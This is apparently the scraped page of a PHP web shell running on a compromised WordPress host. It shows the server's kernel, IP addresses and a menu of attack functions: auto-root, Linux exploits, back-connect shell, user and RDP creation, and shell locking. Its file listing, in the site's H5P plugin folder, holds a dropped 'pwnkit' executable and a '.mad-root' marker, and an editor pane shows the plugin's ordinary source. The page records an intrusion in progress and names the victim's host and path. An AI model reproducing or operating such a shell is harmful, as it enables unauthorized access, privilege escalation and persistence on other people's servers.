Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
plugins /
h5p /
public /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
class-h5p-event.php
2.23
KB
-rw-r--r--
class-h5p-plugin.php
54.48
KB
-rw-r--r--
class-h5p-wordpress.php
36.9
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-h5p-event.php
<?php /** * Makes it easy to track events throughout the H5P system. * * @package H5P * @copyright 2016 Joubel AS * @license MIT */ class H5P_Event extends H5PEventBase { private $user; /** * Adds event type, h5p library and timestamp to event before saving it. * * @param string $type * Name of event to log * @param string $library * Name of H5P library affacted */ function __construct($type, $sub_type = NULL, $content_id = NULL, $content_title = NULL, $library_name = NULL, $library_version = NULL) { // Track the user who initiated the event as well $current_user = wp_get_current_user(); $this->user = $current_user->ID; parent::__construct($type, $sub_type, $content_id, $content_title, $library_name, $library_version); } /** * Store the event. */ protected function save() { global $wpdb; // Get data in array format without NULL values $data = $this->getDataArray(); $format = $this->getFormatArray(); // Add user $data['user_id'] = $this->user; $format[] = '%d'; // Insert into DB $wpdb->insert("{$wpdb->prefix}h5p_events", $data, $format); $this->id = $wpdb->insert_id; return $this->id; } /** * Count number of events. */ protected function saveStats() { global $wpdb; $type = $this->type . ' ' . $this->sub_type; $current_num = $wpdb->get_var($wpdb->prepare( "SELECT num FROM {$wpdb->prefix}h5p_counters WHERE type = '%s' AND library_name = '%s' AND library_version = '%s' ", $type, $this->library_name, $this->library_version)); if ($current_num === NULL) { // Insert $wpdb->insert("{$wpdb->prefix}h5p_counters", array( 'type' => $type, 'library_name' => $this->library_name, 'library_version' => $this->library_version, 'num' => 1 ), array('%s','%s','%s','%d')); } else { // Update num+1 $wpdb->query($wpdb->prepare( "UPDATE {$wpdb->prefix}h5p_counters SET num = num + 1 WHERE type = '%s' AND library_name = '%s' AND library_version = '%s' ", $type, $this->library_name, $this->library_version)); } } }
Close